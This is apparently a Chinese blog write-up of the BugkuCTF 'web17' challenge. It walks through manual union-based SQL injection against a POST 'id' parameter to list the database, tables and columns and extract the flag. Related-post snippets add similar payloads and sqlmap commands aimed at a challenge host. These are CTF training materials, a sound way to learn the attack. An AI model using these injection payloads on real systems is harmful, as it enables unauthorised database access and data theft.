BugkuCTF-web17

最新推荐文章于 2021-06-06 12:15:44 发布
最新推荐文章于 2021-06-06 12:15:44 发布
阅读量156 收藏
点赞数
分类专栏: writeup 网络安全 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46396711/article/details/115876109
版权

原题链接

判断是否存在SQL注入

首先通过简单的输入判断请求方式为post方式,接着f12打开hackbar插件判断是否存在SQL注入(也可直接在题目输入框输入)

  • 先输入id=1

在这里插入图片描述

  • 再输入id=1‘在这里插入图片描述

判断存在SQL注入,进行手工注入,获取数据

  • 通过order by语句判断字段数,#作用是注释后面的引号在这里插入图片描述在这里插入图片描述所以可判断共有四列

information_schema结构 用来存储数据库系统信息
schemata存储数据库名
tables存储表名
columns存储字段名
关键字段:schema_name:表示数据库名称
table_schema:表示表所属数据库名
table_name:表示所属表的名称
column_name:表示字段名

  • 通过union联合查询,查询数据库名,输入id=0' union select 1,database(),user(),version()#在这里插入图片描述

  • 接着查询表名,id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#
    在这里插入图片描述

  • 查询列名,id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),user(),version()#在这里插入图片描述

  • 查询字段的值,得到flag,id=0' union select 1,(select group_concat(skctf_flag) from fl4g),user(),version()#在这里插入图片描述

流年忆雨*
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Bugku CTF web17(Web)
ChaoYue_miku的博客
02-28 543
0、打开网页,根据提示判断为SQL联合注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 1、构造语句:id=0' union select 1,2,3,4# 有回显,进一步查询数据库 2、查询数据库:id=0' union select 1,2,3,database()# 得到数据库名:skctf 3、查询数据表:id=0' union select 1,2,3,table_name fro..
Bugku CTF Web(17-20) Writeup
KRDecad3的博客
06-03 949
Bugku CTF Web(17-) Writeup 0x17flag在index里 打开页面有一个链接,点击链接发现URL改变, 则可能会有文件包含漏洞。 利用php://filter伪协议,php://filter简单理解为用在对文件的读写操作上。 payload: ?file=php://filter/read=convert.base64-encode/resour...
CTF-Web17(涉及手工,脚本,工具注入)
→_→
09-17 360
17.简单的sql注入之3 分析: 手工注入: 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错误 输入?id=1 and 1=2页面正常 ?id=1' and '1'='2 页面无输出可以看出,这个是字符型SQL注入,未过滤引号和and,条件正确的情况下输出hello,错误无输出,比起SQL盲注,好 像又多了语法报错 猜解表 ?id=1' and (select count(*) from 表名)>0 .
bugku web15/web17
天衷网络科技有限公司
04-08 194
web15/web17 1.web15 这个没什么好说的,直接生成字典,方bp里面跑,密码在1开头的六位数里,不用跑太多,出题人仁慈 2.web17 拿到题目网址直接在火狐打开,看到成绩查询第一反应就是sql注入,先随便输入点什么看看 输入1,直接出现成绩单,get传参没有反应,直接点击load URL,发现是post注入,这里可以使用手工注入和sqlmap直接跑出来,我为了省事直接sqlmap跑了 找到注入点,然后使用bp抓包,抓包要求是从注入点,点击命令执行后抓的包,将抓到的包复制成txt文件,放到
Bugku-Web-Wp
热门推荐
Hydra的博客
11-02 3万+
目录   1.web2 2.计算器 3. web基础$_GET 4. web基础$_POST 5.矛盾 6. web3 7. 域名解析 8.你必须让他停下 9.本地包含 10.变量1  11.web5 12.头等舱 13.网站被黑 14. 管理员系统 15.web4  16.flag在index里 17.输入密码查看flag 18.点击一百万次 19. 备份...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
bugku web17 wp
m0_55185160的博客
06-06 112
最近在学习数据分析 最近在学习数据分析,学习了一些sql语言,激起了我对sql注入的学习,于是我刷了bugku 成绩查询这个题 下面记录下我学习的过程吧。 打开题目是一个输入框于是我想可能与sql注入有关,我查看网页源码 发现要用post的方式传参于是打开hackbar进行传参,看到name=id,placeholder = l ,2,3意思是传参name为id placeholder是输入用户名为1,2,3,…于是我传参id=1试试 结果有回显,成功查到了成绩单,然后换1,2,3…试试,发现有回显, 发现
新BugKu-web篇-web17
jiuyongpinyin的博客
05-30 146
web17 这道题是典型的sql注入,直接sqlmap一把梭就可以了,首先通过题目能够确定是post传参 并且参数的id,那么就直接sqlmap,payload如下 sudo sqlmap -u "http://114.67.246.176:10297/index.php" --data "id=1" --current-db --batch //查询当前数据库 sudo sqlmap -u "http://114.67.246.176:10297/index.php" --data "id=1" -D
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 282
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
综合集团数字化转型顶层设计思路.pptx
06-14
综合集团数字化转型顶层设计思路.pptx
学生成绩管理系统(SSH+MYSQL)130221
06-14
学生成绩管理系统(SSH+MYSQL)130221
【工具模型】37个OD方法工具盘点.pptx
06-14
【工具模型】37个OD方法工具盘点.pptx
毕设项目:基于bootstrap+PHP+MySQL的个人博客系统(源码+数据库).zip
最新发布
06-14
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
移动政务云解决方案.pptx
06-14
移动政务云解决方案.pptx
基于Selenium的Java爬虫实战(内含谷歌浏览器Chrom和Chromedriver版本122.0.6183.0)
06-14
资源包括: 1.Java爬虫实战代码 2.selenium学习笔记 3.代码演示视频 4.谷歌浏览器chrom122.0.6183.0 chrome-linux64.zip chrome-mac-arm64.zip chrome-mac-x64.zip chrome-win32.zip chrome-win64.zip 5.谷歌浏览器驱动器Chromedriver122.0.6183.0 chromedriver-linux64.zip chromedriver-mac-arm64.zip chromedriver-mac-x64.zip chromedriver-win32.zip chromedriver-win64.zip 特别说明:Chrome 为测试版(不会自动更新) 仅适用于自动测试。若要进行常规浏览,请使用可自动更新的标准版 Chrome。)
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值